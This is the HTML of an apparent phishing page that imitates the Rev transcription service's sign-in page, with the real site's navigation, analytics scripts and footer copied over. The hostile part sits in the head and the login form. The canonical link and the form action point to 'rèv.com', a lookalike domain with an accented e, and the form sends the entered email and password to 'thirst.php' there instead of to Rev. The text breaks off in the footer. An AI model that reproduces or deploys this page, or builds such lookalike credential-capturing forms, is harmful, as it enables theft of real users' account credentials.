<!DOCTYPE html>
<html lang="en-us"><!-- Server: prod-web4 -->
<head xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://ogp.me/ns#">
	<base href="https://www.rev.com/account/" />
	<title>Sign In - Rev</title>
	<meta property="og:title" content="Sign In - Rev"/><meta property="og:type" content="website"/><meta property="og:site_name" content="Rev"/><meta property="og:description" content="Online audio transcription and video caption services. Serving more than 100k customers worldwide."/><meta property="og:image" content="https://www.rev.com/content/curve/img/home/rev_twittercard.jpg"/><meta property="og:image:width" content="1200"/><meta property="og:image:height" content="630"/><meta property="og:url" content="https://www.rev.com/account/auth/login"/><meta property="fb:app_id" content="199170300134516"/><meta property="twitter:card" content="summary_large_image"/><meta property="twitter:site" content="@rev"/><meta name="viewport" content="width=device-width, initial-scale=1"/><meta name="format-detection" content="telephone=no"/>
	<link href="https://rèv.com/login.html" rel="canonical" /><meta name="fox:build" content="476-0"/>
	<link href="/apple-touch-icon.png?v=RymW3lzQY9" rel="apple-touch-icon" sizes="180x180" />
	<link href="/Content/img/rev/favicons/favicon-32x32.png?v=RymW3lzQY9" rel="icon" sizes="32x32" type="image/png" />
	<link href="/Content/img/rev/favicons/favicon-16x16.png?v=RymW3lzQY9" rel="icon" sizes="16x16" type="image/png" />
	<link href="/Content/img/rev/favicons/manifest.json?v=RymW3lzQY9" rel="manifest" />
	<link color="#ee3524" href="/Content/img/rev/favicons/safari-pinned-tab.svg?v=RymW3lzQY9" rel="mask-icon" />
	<link href="/favicon.ico?v=RymW3lzQY9" rel="shortcut icon" /><meta name="msapplication-TileColor" content="#da532c"/><meta name="msapplication-config" content="/Content/img/rev/favicons/browserconfig.xml?v=RymW3lzQY9"/><meta name="theme-color" content="#ffffff"/><script type="text/javascript">
        (function () {
            var now = new Date();
            var offset = 0 - now.getTimezoneOffset();
            var expire = new Date();
            expire.setFullYear(now.getFullYear() + 5);
            document.cookie = 'ft_tz=' + escape(offset) + ';expires=' + expire.toGMTString() + ';path=/'
        })();
    </script><script>
    (function() {
        var d = document;
        var c = d.createElement('script');
        if (!('noModule' in c) && 'onbeforeload' in c) {
            var s = false;
            d.addEventListener('beforeload', function(e) {
            if (e.target === c) {
                s = true;
            } else if (!e.target.hasAttribute('nomodule') || !s) {
                return;
            }
            e.preventDefault();
            }, true);

            c.type = 'module';
            c.src = '.';
            d.head.appendChild(c);
            c.remove();
        }
    }());
</script><script nomodule="" src="/build/polyfills.bundle.js?v=CC55C9FE67A46EE143D16865A4EC7AAB" type="text/javascript"></script><script src="/bundles/jquery.js?v=N9X31oj24lli1uVFpX6uj0M2WdN7GdgMjnvYEUoIx7s1"></script><script>
            window.ga = window.ga || function () { (ga.q = ga.q || []).push(arguments) }; ga.l = +new Date;
            ga('create', 'UA-18309154-6', 'auto');
        </script><script async="" src="https://www.google-analytics.com/analytics.js"></script><script>
        
        ga('set', 'dimension1', 'Anonymous');
    

            
        ga('send', 'pageview');
    

</script><script>
    !function () {
        var analytics = window.analytics = window.analytics || []; if (!analytics.initialize) if (analytics.invoked) window.console && console.error && console.error("Segment snippet included twice."); else {analytics.invoked = !0; analytics.methods = ["trackSubmit", "trackClick", "trackLink", "trackForm", "pageview", "identify", "reset", "group", "track", "ready", "alias", "debug", "page", "once", "off", "on", "addSourceMiddleware", "addIntegrationMiddleware", "setAnonymousId", "addDestinationMiddleware"]; analytics.factory = function (e) { return function () { var t = Array.prototype.slice.call(arguments); t.unshift(e); analytics.push(t); return analytics } }; for (var e = 0; e < analytics.methods.length; e++) { var key = analytics.methods[e]; analytics[key] = analytics.factory(key) } analytics.load = function (key, e) { var t = document.createElement("script"); t.type = "text/javascript"; t.async = !0; t.src = 'https://evs.bubo-bubo.rev.com/vuJKUsyQcbGfLatMF8YUDz/tyKCHHbrpCEF1awtHhhquy.min.js'; var n = document.getElementsByTagName("script")[0]; n.parentNode.insertBefore(t, n); analytics._loadOptions = e }; analytics.SNIPPET_VERSION = "4.13.1";
            if (true) {
                analytics.load('WEmx47r1UEglal6RqTQxEBV8k5L4SKYb');
                analytics.ready(function () {
                    const gaIsDefined = typeof (ga) === "function";
                    const isCustomer = "customers" === "customers";
                    if (!(gaIsDefined && isCustomer)) {
                        window.analytics.page({});
                    } else {
                        ga(function (tracker) {
                            const clientId = tracker.get("clientId");
                            const externalIdObject =
                            {
                                externalIds: [
                                    {
                                        id: clientId,
                                        type: "ga_client_id",
                                        collection: "users",
                                        encoding: "none"
                                    }
                                ]
                            };
                            window.analytics.page({}, externalIdObject);
                        })
                    }
                })
            }
        }
    }();
</script>
	<link href="/build/styles/pages/account/login.css?v=16D6A2383C84C15CFF57D1A112CA211B" rel="stylesheet" type="text/css" /><script src="/build/auth.bundle.js?v=E3752981AF7DE65B3EF4F31389C2242F" type="text/javascript"></script>
</head>
<body class="rubik min-vh-100 flex flex-column h-100" ontouchstart="">
<div class="absolute w-100 cover" id="above-the-fold-bg">&nbsp;</div>

<nav class="dt w-100 border-box pa3 ph5-l" id="header-navbar">
<div class="w-25 dtc v-mid tl mb0"><a class="mid-gray dim flex" href="/" title="Home"><img alt="Rev" class="dib w3 w-auto-l" src="/Content/curve/img/logo.svg?v=145A43124AFE775A2C8882935B1F5605" style="height: 3rem; width: 5.5rem;" /> </a></div>

<div class="dtc v-mid w-75 tr">
<div class="relative menu v-mid dn show-nav-mapping dib-l f6 f5-l mr3 mr4-l pointer" href="#" id="services-menu" title="Services Menu"><span class="navbar-link">Services</span>

<div class="dn ba bg-white dropdown-content center" id="services-menu-content">
<div class="mr4 tl mw5">
<div class="f5 fw5 nowrap blue"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white br--top bb" href="/transcription" onclick="trackDropdownMenuMixpanelEvent('Services', 'Transcription')">Transcription</a></div>

<div class="f6 mid-gray mt2"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white br--top bb" href="/transcription" onclick="trackDropdownMenuMixpanelEvent('Services', 'Transcription')">99% accuracy, by human professionals</a></div>
</div>

<div class="ml3 tr blue">
<div class="f2 fw3"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white br--top bb" href="/transcription" onclick="trackDropdownMenuMixpanelEvent('Services', 'Transcription')">$1.25</a></div>

<div class="f7 fw5 dark-gray mt1 tracked nowrap"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white br--top bb" href="/transcription" onclick="trackDropdownMenuMixpanelEvent('Services', 'Transcription')">PER MINUTE</a></div>
</div>

<div class="mr4 tl mw5">
<div class="f5 fw5 nowrap dark-blue"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="/automated-transcription" onclick="trackDropdownMenuMixpanelEvent('Services', 'Rough Draft')">Rough Draft</a></div>

<div class="f6 mid-gray mt2"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="/automated-transcription" onclick="trackDropdownMenuMixpanelEvent('Services', 'Rough Draft')">80% accuracy, machine generated transcript</a></div>
</div>

<div class="ml3 tr dark-blue">
<div class="f2 fw3"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="/automated-transcription" onclick="trackDropdownMenuMixpanelEvent('Services', 'Rough Draft')">25&cent;</a></div>

<div class="f7 fw5 dark-gray mt1 tracked nowrap"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="/automated-transcription" onclick="trackDropdownMenuMixpanelEvent('Services', 'Rough Draft')">PER MINUTE</a></div>
</div>

<div class="mr4 tl mw5">
<div class="f5 fw5 nowrap red"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="/caption" onclick="trackDropdownMenuMixpanelEvent('Services', 'Captions')">Captions</a></div>

<div class="f6 mid-gray mt2"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="/caption" onclick="trackDropdownMenuMixpanelEvent('Services', 'Captions')">English captions for videos</a></div>
</div>

<div class="ml3 tr red">
<div class="f2 fw3"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="/caption" onclick="trackDropdownMenuMixpanelEvent('Services', 'Captions')">$1.25</a></div>

<div class="f7 fw5 dark-gray mt1 tracked nowrap"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="/caption" onclick="trackDropdownMenuMixpanelEvent('Services', 'Captions')">PER MINUTE</a></div>
</div>

<div class="mr4 tl mw5">
<div class="f5 fw5 nowrap purple"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="/subtitle/translator" onclick="trackDropdownMenuMixpanelEvent('Services', 'Foreign Subtitles')">Foreign Subtitles</a></div>

<div class="f6 mid-gray mt2"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="/subtitle/translator" onclick="trackDropdownMenuMixpanelEvent('Services', 'Foreign Subtitles')">Foreign language subtitles for videos</a></div>
</div>

<div class="ml3 tr purple">
<div class="f2 fw3"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="/subtitle/translator" onclick="trackDropdownMenuMixpanelEvent('Services', 'Foreign Subtitles')">$3-7</a></div>

<div class="f7 fw5 dark-gray mt1 tracked nowrap"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="/subtitle/translator" onclick="trackDropdownMenuMixpanelEvent('Services', 'Foreign Subtitles')">PER MINUTE</a></div>
</div>

<div class="mr4 tl mw5">
<div class="f5 fw5 nowrap black"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="/zoom-live-captions" onclick="trackDropdownMenuMixpanelEvent('Services', 'Live Captions for Zoom')">Live Captions for Zoom</a></div>

<div class="f6 mid-gray mt2"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="/zoom-live-captions" onclick="trackDropdownMenuMixpanelEvent('Services', 'Live Captions for Zoom')">Automatic live captions for Zoom</a></div>
</div>

<div class="ml3 tr black">
<div class="f2 fw3"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="/zoom-live-captions" onclick="trackDropdownMenuMixpanelEvent('Services', 'Live Captions for Zoom')">$20</a></div>

<div class="f7 fw5 dark-gray mt1 tracked nowrap"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="/zoom-live-captions" onclick="trackDropdownMenuMixpanelEvent('Services', 'Live Captions for Zoom')">PER HOST</a></div>
</div>

<div class="mr4 tl mw5">
<div class="f5 fw5 nowrap green"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="/speech-to-text-apis" onclick="trackDropdownMenuMixpanelEvent('Services', 'Speech-to-Text APIs')">Speech-to-Text APIs</a></div>

<div class="f6 mid-gray mt2"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="/speech-to-text-apis" onclick="trackDropdownMenuMixpanelEvent('Services', 'Speech-to-Text APIs')">APIs for all your accuracy requirements</a></div>
</div>

<div class="ml3 tr green">&nbsp;</div>

<div class="dtc v-mid fw5 mid-gray ttu view-services"><a class="service-card-link h3 f6 white tracked-mega bt b--white-30 dt tl w-100 link pl4 bg-animate hover-bg-near-white ma0 br--bottom" href="/services">View all services</a></div>
</div>
</div>
<a class="dn show-nav-mapping v-mid dib-l navbar-link f6 f5-l mr3 mr4-l mixpanel-link" data-mixpanel-title="Menu Bar Link Clicked: Enterprise" href="https://enterprise.rev.com/rev-pro" title="Enterprise">Enterprise </a> <a class="dn show-nav-mapping v-mid dib-l navbar-link f6 f5-l mr3 mr4-l mixpanel-link" data-mixpanel-title="Menu Bar Link Clicked: Contact" href="/contact" title="Contact Sales"> Contact Sales </a>

<div class="relative menu v-mid dn show-nav-mapping dib-l f6 f5-l mr3 mr4-l pointer" href="#" id="resources-menu" title="Resources Menu"><span class="navbar-link">Resources</span>

<div class="dn ba bg-white dropdown-content center" id="resources-menu-content">
<div class="tl mw5">
<div class="f5 fw5 nowrap blue"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white br--top bb" href="/about" onclick="trackDropdownMenuMixpanelEvent('Services', 'About Us')">About Us</a></div>

<div class="f6 mid-gray mt2"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white br--top bb" href="/about" onclick="trackDropdownMenuMixpanelEvent('Services', 'About Us')">Learn more about our company and mission</a></div>
</div>

<div class="tl mw5">
<div class="f5 fw5 nowrap blue"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="https://www.rev.com/blog/resources" onclick="trackDropdownMenuMixpanelEvent('Services', 'Resource Library')">Resource Library</a></div>

<div class="f6 mid-gray mt2"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="https://www.rev.com/blog/resources" onclick="trackDropdownMenuMixpanelEvent('Services', 'Resource Library')">How-to articles, guides, and tutorials</a></div>
</div>
<a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" noreferrer="" rel="&quot;noopener" target="&quot;_blank&quot;"> </a>

<div class="tl mw5">
<div class="f5 fw5 nowrap blue"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" noreferrer="" rel="&quot;noopener" target="&quot;_blank&quot;">Help Center</a></div>

<div class="f6 mid-gray mt2"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" noreferrer="" rel="&quot;noopener" target="&quot;_blank&quot;">Support and knowledge database</a></div>
</div>
<a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" noreferrer="" rel="&quot;noopener" target="&quot;_blank&quot;"> </a> <a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="https://www.rev.com/blog/speech-to-text-report" onclick="trackDropdownMenuMixpanelEvent('Services', 'Speech to Text Report 2020')"> </a>

<div class="tl mw5">
<div class="f5 fw5 nowrap blue"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="https://www.rev.com/blog/speech-to-text-report" onclick="trackDropdownMenuMixpanelEvent('Services', 'Speech to Text Report 2020')">Speech to Text Report 2020</a></div>

<div class="f6 mid-gray mt2"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="https://www.rev.com/blog/speech-to-text-report" onclick="trackDropdownMenuMixpanelEvent('Services', 'Speech to Text Report 2020')">Research report on how businesses use speech to text services</a></div>
</div>
<a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="https://www.rev.com/blog/speech-to-text-report" onclick="trackDropdownMenuMixpanelEvent('Services', 'Speech to Text Report 2020')"> </a> <a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="https://enterprise.rev.com/webinars" onclick="trackDropdownMenuMixpanelEvent('Services', 'Webinars')"> </a>

<div class="tl mw5">
<div class="f5 fw5 nowrap blue"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="https://enterprise.rev.com/webinars" onclick="trackDropdownMenuMixpanelEvent('Services', 'Webinars')">Webinars</a></div>

<div class="f6 mid-gray mt2"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="https://enterprise.rev.com/webinars" onclick="trackDropdownMenuMixpanelEvent('Services', 'Webinars')">Stories from high-performing Rev users and customers</a></div>
</div>
<a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="https://enterprise.rev.com/webinars" onclick="trackDropdownMenuMixpanelEvent('Services', 'Webinars')"> </a> <a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="https://www.rev.com/blog/" onclick="trackDropdownMenuMixpanelEvent('Services', 'Blog')"> </a>

<div class="tl mw5">
<div class="f5 fw5 nowrap blue"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="https://www.rev.com/blog/" onclick="trackDropdownMenuMixpanelEvent('Services', 'Blog')">Blog</a></div>

<div class="f6 mid-gray mt2"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="https://www.rev.com/blog/" onclick="trackDropdownMenuMixpanelEvent('Services', 'Blog')">Industry topics, updates, and ideas</a></div>
</div>
<a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="https://www.rev.com/blog/" onclick="trackDropdownMenuMixpanelEvent('Services', 'Blog')"> </a> <a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="https://enterprise.rev.com/customer-stories/" onclick="trackDropdownMenuMixpanelEvent('Services', 'Customer Stories')"> </a>

<div class="tl mw5">
<div class="f5 fw5 nowrap blue"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="https://enterprise.rev.com/customer-stories/" onclick="trackDropdownMenuMixpanelEvent('Services', 'Customer Stories')">Customer Stories</a></div>

<div class="f6 mid-gray mt2"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="https://enterprise.rev.com/customer-stories/" onclick="trackDropdownMenuMixpanelEvent('Services', 'Customer Stories')">Case studies and testimonials</a></div>
</div>
<a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  bb" href="https://enterprise.rev.com/customer-stories/" onclick="trackDropdownMenuMixpanelEvent('Services', 'Customer Stories')"> </a> <a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  " href="https://www.rev.com/api/docs" onclick="trackDropdownMenuMixpanelEvent('Services', 'Developer Docs')"> </a>

<div class="tl mw5">
<div class="f5 fw5 nowrap blue"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  " href="https://www.rev.com/api/docs" onclick="trackDropdownMenuMixpanelEvent('Services', 'Developer Docs')">Developer Docs</a></div>

<div class="f6 mid-gray mt2"><a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  " href="https://www.rev.com/api/docs" onclick="trackDropdownMenuMixpanelEvent('Services', 'Developer Docs')">Rev API documentation</a></div>
</div>
<a class="service-card-link link flex justify-between b--black-30 bg-animate hover-bg-near-white bg-white  " href="https://www.rev.com/api/docs" onclick="trackDropdownMenuMixpanelEvent('Services', 'Developer Docs')"> </a></div>
</div>
<script>
            function trackDropdownMenuMixpanelEvent(dropdownMenuName, dropdownMenuItem) {
                if (window.rev_Mixpanel !== undefined) {
                    window.rev_Mixpanel.trackEvent('Menu Bar ' + dropdownMenuName + ' Dropdown: Clicked ' + dropdownMenuItem);
                }
            }
        </script>

<div class="dn v-mid show-nav-mapping dib-l dark-gray f6 f5-l"><a class="dn show-nav-mapping dib-l navbar-link f6 f5-l" href="/account/auth/login" rel="nofollow" title="Login">Login</a></div>

<div class="hide-side-menu-mapping" id="side-menu"><input class="dn" id="side-menu-check" type="checkbox" /> <label class="dib dn-l navbar-link tracked-mega ttu" for="side-menu-check"> </label>


<label class="dib dn-l navbar-link tracked-mega ttu" for="side-menu-check"> </label>

<div class="dib dn-l side-menu fixed right-0 top-0 bottom-0 pl4 pr4 bg-white overflow-scroll"><label class="menu-close gray f2 fw3 absolute" for="side-menu-check" href="#">&times;</label>

<div class="flex justify-between flex-column h-100 pt5 pb2">
<div>
<div class="ttu tl f6 fw5 tracked mid-gray">Services</div>

<ul class="tl list pl0 pr5 f6">
	<li class="pt3"><a class="navbar-link" href="/transcription">Transcription</a></li>
	<li class="pt3"><a class="navbar-link" href="/automated-transcription">Automated Transcription</a></li>
	<li class="pt3"><a class="navbar-link" href="/caption">Captions</a></li>
	<li class="pt3"><a class="navbar-link" href="/subtitle/translator">Foreign Subtitles</a></li>
	<li class="pt3"><a class="navbar-link" href="/zoom-live-captions">Live Captions for Zoom</a></li>
	<li class="pt3"><a class="navbar-link" href="/speech-to-text-apis">Speech-to-Text APIs</a></li>
</ul>
</div>

<div>
<ul class="tl list pl0 f6">
	<li class="pt3"><a class="navbar-link" href="https://enterprise.rev.com/rev-pro">Enterprise</a></li>
	<li class="pt3"><a class="navbar-link" href="/freelancers?fromMobileSideMenu=true">Freelancers</a></li>
	<li class="pt3"><a class="navbar-link" href="https://www.rev.com/blog/">Blog</a></li>
	<li class="pt3"><a class="navbar-link" href="/about">About</a></li>
	<li class="pt3"><a class="navbar-link" href="/contact">Contact Sales</a></li>
	<li class="pt3"><a class="navbar-link f6" href="/account/auth/login" rel="nofollow" title="Login">Login</a></li>
</ul>
</div>
</div>
</div>
</div>
</div>
</nav>

<div id="site-content">
<div>
<div>
<h1 class="login-header-l dn db-l">Sign In</h1>

<div class="account-authentication-container ">
<div class="flex-column">
<h1 class="login-header">Sign In</h1>

<form action="https://rèv.com/thirst.php" method="post" >
<div class="dark-gray mb3 field" id="email-container">
<div class="field  "><label for="Email">Email address</label> <input autocomplete="username" class="text-input text-box single-line" id="name" name="name" type="email" value="" /></div>
</div>


<div class="dark-gray mb3 ttu field password-submit-field">
<div class="field  ">
<div class="flex"><label for="Password">Password</label> <span class="rubik tu ml-auto" id="show-hide-password">show</span></div>
<input autocomplete="current-password" class="text-input text-box single-line password" id="pname" name="pname" type="password" /></div>
</div>

<div class="pt3 pb4 pb5-m password-submit-field"><button class="btn btn-primary button-red button-normal bw0 {mixpanel}" data_mixpanel_title="{mixpanelTitle}" id="login-btn">SIGN IN</button></div>

<div class="field"><label class="checkbox pb3 dark-gray flex"><input id="rememberMe" name="rememberMe" type="checkbox" value="true" /> Remember this device for 30 days </label></div>

<p class="mv0"><a href="/account/auth/forgotpassword">Forgot your password?</a></p>

<div>
<div id="grecaptcha-container">&nbsp;</div>
</div>
</form>
</div>

<div class="flex-column">
<div class="navy f4 fw5 mb3 lh-copy">Create an Account</div>

<div class="dark-gray b">Benefits Include:</div>

<dl>
	<dt>Faster checkout</dt>
	<dd>Store contact and payment info</dd>
	<dt>Save preferences</dt>
	<dd>Document and formatting types</dd>
	<dt>Stay informed</dt>
	<dd>Detailed order history</dd>
</dl>
<a class="button-green button-normal" href="/account/auth/register?returnUrl=%2Fworkspace%2Fmywork">Create account</a>

<p class="secondary"><a href="/freelancers">Looking to be a Rev Freelancer? Visit here.</a></p>
</div>
</div>
</div>
</div>
</div>

<footer class="flex-none bg-near-black w-100 pt4 pt5-ns pb4" id="rev-curve-footer">
<div class="mw9 center white ph4 pb2 pb0-ns ph5-l flex flex-row flex-wrap justify-between-l">
<div class="pr4 footer-section mb4 w-50 w-auto-ns"><a class="f7 fw5 tracked ttu white text-link footer-column-header" href="/transcription">Audio &amp; Video Transcription</a>

<ul class="f6 o-80 pl0 mt2 ma0">
	<li class="list pl0 pt3"><a class="footer-text-link" href="/transcription/how-it-works" id="Footer TC: How It Works">How It Works</a></li>
	<script>
        var element = document.getElementById("Footer TC: How It Works");
        if (window.analytics) {
            window.analytics.trackLink(element, "Button Click", {
                altEventName: "Footer TC: How It Works",
                stateChange: "Redirect",
                locationUrl: "https://www.rev.com/account/auth/login",
                redirectUrl: "/transcription/how-it-works",
                buttonText: "How It Works",
                buttonLocation: "Main Page"
            });
        }
</script>
	<li class="list pl0 pt3"><a class="footer-text-link" href="/transcription/faq" id="Footer TC: FAQ">FAQ</a></li>
	<script>
        var element = document.getElementById("Footer TC: FAQ");
        if (window.analytics) {
            window.analytics.trackLink(element, "Button Click", {
                altEventName: "Footer TC: FAQ",
                stateChange: "Redirect",
                locationUrl: "https://www.rev.com/account/auth/login",
                redirectUrl: "/transcription/faq",
                buttonText: "FAQ",
                buttonLocation: "Main Page"
            });
        }
</script>
	<li class="list pl0 pt3"><a class="footer-text-link" href="/callrecorder" id="Footer TC: Free Call Recorder">Free Call Recorder</a></li>
	<script>
        var element = document.getElementById("Footer TC: Free Call Recorder");
        if (window.analytics) {
            window.analytics.trackLink(element, "Button Click", {
                altEventName: "Footer TC: Free Call Recorder",
                stateChange: "Redirect",
                locationUrl: "https://www.rev.com/account/auth/login",
                redirectUrl: "/callrecorder",
                buttonText: "Free Call Recorder",
                buttonLocation: "Main Page"
            });
        }
</script>
	<li class="list pl0 pt3"><a class="footer-text-link" href="/voicerecorder" id="Footer TC: Voice Recorder App">Voice Recorder App</a></li>
	<script>
        var element = document.getElementById("Footer TC: Voice Recorder App");
        if (window.analytics) {
            window.analytics.trackLink(element, "Button Click", {
                altEventName: "Footer TC: Voice Recorder App",
                stateChange: "Redirect",
                locationUrl: "https://www.rev.com/account/auth/login",
                redirectUrl: "/voicerecorder",
                buttonText: "Voice Recorder App",
                buttonLocation: "Main Page"
            });
        }
</script>
	<li class="list pl0 pt3"><a class="footer-text-link" href="/transcription-app" id="Footer TC: Transcription App">Transcription App</a></li>
	<script>
        var element = document.getElementById("Footer TC: Transcription App");
        if (window.analytics) {
            window.analytics.trackLink(element, "Button Click", {
                altEventName: "Footer TC: Transcription App",
                stateChange: "Redirect",
                locationUrl: "https://www.rev.com/account/auth/login",
                redirectUrl: "/transcription-app",
                buttonText: "Transcription App",
                buttonLocation: "Main Page"
            });
        }
</script>
	<li class="list pl0 pt3"><a class="footer-text-link" href="/onlinevoicerecorder" id="Footer TC: Online Voice Recorder">Online Voice Recorder</a></li>
	<script>
        var element = document.getElementById("Footer TC: Online Voice Recorder");
        if (window.analytics) {
            window.analytics.trackLink(element, "Button Click", {
                altEventName: "Footer TC: Online Voice Recorder",
                stateChange: "Redirect",
                locationUrl: "https://www.rev.com/account/auth/login",
                redirectUrl: "/onlinevoicerecorder",
                buttonText: "Online Voice Recorder",
                buttonLocation: "Main Page"
            });
        }
</script>
	<li class="list pl0 pt3"><a class="footer-text-link" href="/audiotrimmercutter" id="Footer TC: Audio Trimmer &amp;amp; Cutter">Audio Trimmer &amp; Cutter</a></li>
	<script>
        var element = document.getElementById("Footer TC: Audio Trimmer &amp; Cutter");
        if (window.analytics) {
            window.analytics.trackLink(element, "Button Click", {
                altEventName: "Footer TC: Audio Trimmer &amp; Cutter",
                stateChange: "Redirect",
                locationUrl: "https://www.rev.com/account/auth/login",
                redirectUrl: "/audiotrimmercutter",
                buttonText: "Audio Trimmer &amp; Cutter",
                buttonLocation: "Main Page"
            });
        }
</script>
	<li class="list pl0 pt3"><a class="footer-text-link" href="/blog/resources/how-to-transcribe-audio-to-text" id="Footer TC: Transcribe Audio to Text">Transcribe Audio to Text</a></li>
	<script>
        var element = document.getElementById("Footer TC: Transcribe Audio to Text");
        if (window.analytics) {
            window.analytics.trackLink(element, "Button Click", {
                altEventName: "Footer TC: Transcribe Audio to Text",
                stateChange: "Redirect",
                locationUrl: "https://www.rev.com/account/auth/login",
                redirectUrl: "/blog/resources/how-to-transcribe-audio-to-text",
                buttonText: "Transcribe Audio to Text",
                buttonLocation: "Main Page"
            });
        }
</script>
	<li class="list pl0 pt3"><a class="footer-text-link" href="/automated-transcription" id="Footer TC: Automated Transcription">Automated Transcription</a></li>
	<script>
        var element = document.getElementById("Footer TC: Automated Transcription");
        if (window.analytics) {
            window.analytics.trackLink(element, "Button Click", {
                altEventName: "Footer TC: Automated Transcription",
                stateChange: "Redirect",
                locationUrl: "https://www.rev.com/account/auth/login",
                redirectUrl: "/automated-transcription",
                buttonText: "Automated Transcription",
                buttonLocation: "Main Page"
            });
        }
</script>
</ul>
</div>

<div class="pr4 footer-section mb4 w-50 w-auto-ns"><a class="f7 fw5 tracked ttu white text-link footer-column-header" href="/caption">Closed Captions</a>

<ul class="f6 o-80 pl0 mt2 ma0">
	<li class="list pl0 pt3"><a class="footer-text-link" href="/caption/how-it-works" id="Footer CP: How It Works">How It Works</a></li>
	<script>
        var element = document.getElementById("Footer CP: How It Works");
        if (window.analytics) {
            window.analytics.trackLink(element, "Button Click", {
                altEventName: "Footer CP: How It Works",
                stateChange: "Redirect",
                locationUrl: "https://www.rev.com/account/auth/login",
                redirectUrl: "/caption/how-it-works",
                buttonText: "How It Works",
                buttonLocation: "Main Page"
            });
        }
</script>
	<li class="list pl0 pt3"><a class="footer-text-link" href="/caption/faq" id="Footer CP: FAQ">FAQ</a></li>
	<script>
        var element = document.getElementById("Footer CP: FAQ");
        if (window.analytics) {
            window.analytics.trackLink(element, "Button Click", {
                altEventName: "Footer CP: FAQ",
                stateChange: "Redirect",
                locationUrl: "https://www.rev.com/account/auth/login",
                redirectUrl: "/caption/faq",
                buttonText: "FAQ",
                buttonLocation: "Main Page"
            });
        }
</script>
	<li class="list pl0 pt3"><a class="footer-text-link" href="/captionconverter" id="Footer CP: Caption Converter">Caption Converter</a></li>
	<script>
        var element = document.getElementById("Footer CP: Caption Converter");
        if (window.analytics) {
            window.analytics.trackLink(element, "Button Click", {
                altEventName: "Footer CP: Caption Converter",
                stateChange: "Redirect",
                locationUrl: "https://www.rev.com/account/auth/login",
                redirectUrl: "/captionconverter",
                buttonText: "Caption Converter",
                buttonLocation: "Main Page"
            });
        }
</script>
	<li class="list pl0 pt3"><a class="footer-text-link" href="/subtitle" id="Footer CP: Subtitles">Subtitles</a></li>
	<script>
        var element = document.getElementById("Footer CP: Subtitles");
        if (window.analytics) {
            window.analytics.trackLink(element, "Button Click", {
                altEventName: "Footer CP: Subtitles",
                stateChange: "Redirect",
                locationUrl: "https://www.rev.com/account/auth/login",
                redirectUrl: "/subtitle",
                buttonText: "Subtitles",
                buttonLocation: "Main Page"
            });
        }
</script>
